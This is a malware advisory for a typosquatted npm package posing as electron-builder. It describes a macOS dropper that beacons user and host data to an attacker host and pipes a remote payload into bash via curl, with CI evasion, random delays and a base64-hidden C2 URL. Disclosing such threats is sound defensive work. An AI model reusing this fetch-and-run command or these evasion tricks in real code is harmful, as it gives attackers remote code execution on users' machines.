VYPR

npm · Malicious package advisory

Malware

@403name/electron-buidler

MAL-2026-5547

Malicious code in @403name/electron-buidler (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6ed72e6dbbdb78cd8fc99bfafc15900f16543690460ae2cfad826aeee20c05a4)
On require(), index.js executes an immediately-invoked function that platform-gates to macOS, skips CI environments, drops a one-shot marker file in ~/.cache/.nyx-npm/eb, then after a 30-90 second random delay performs two attacker-controlled network operations. First, it issues a curl GET to https://k7xm9q.xyz/api/clickfix-callback carrying a beacon ID, $USER, os.hostname(), and the literal tag 'npm_electron-buidler' as query parameters, identifying the victim to the attacker. Second, it fetches a dead-drop file at https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt to learn a C2 base (base64-encoded fallback decodes to https://k7xm9q.xyz), then pipes `curl -sSfL <C2>/api/payload/ | /bin/bash` via spawn('/bin/sh','-c',...) with `& disown` to detach the shell. The C2 host is concealed via atob('aHR0cHM6Ly9rN3htOXEueHl6'). The package name '@403name/electron-buidler' is a one-character typo of the popular 'electron-builder' package under an unrelated scope; the README's 'Electron application builder' claim is a cover for the dropper. Importing this package on a non-CI macOS host yields full remote code execution as the installing user with attacker-controlled payload delivery and no consent.

Compromised versions (2)

  • 1.0.1
  • 1.0.0

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.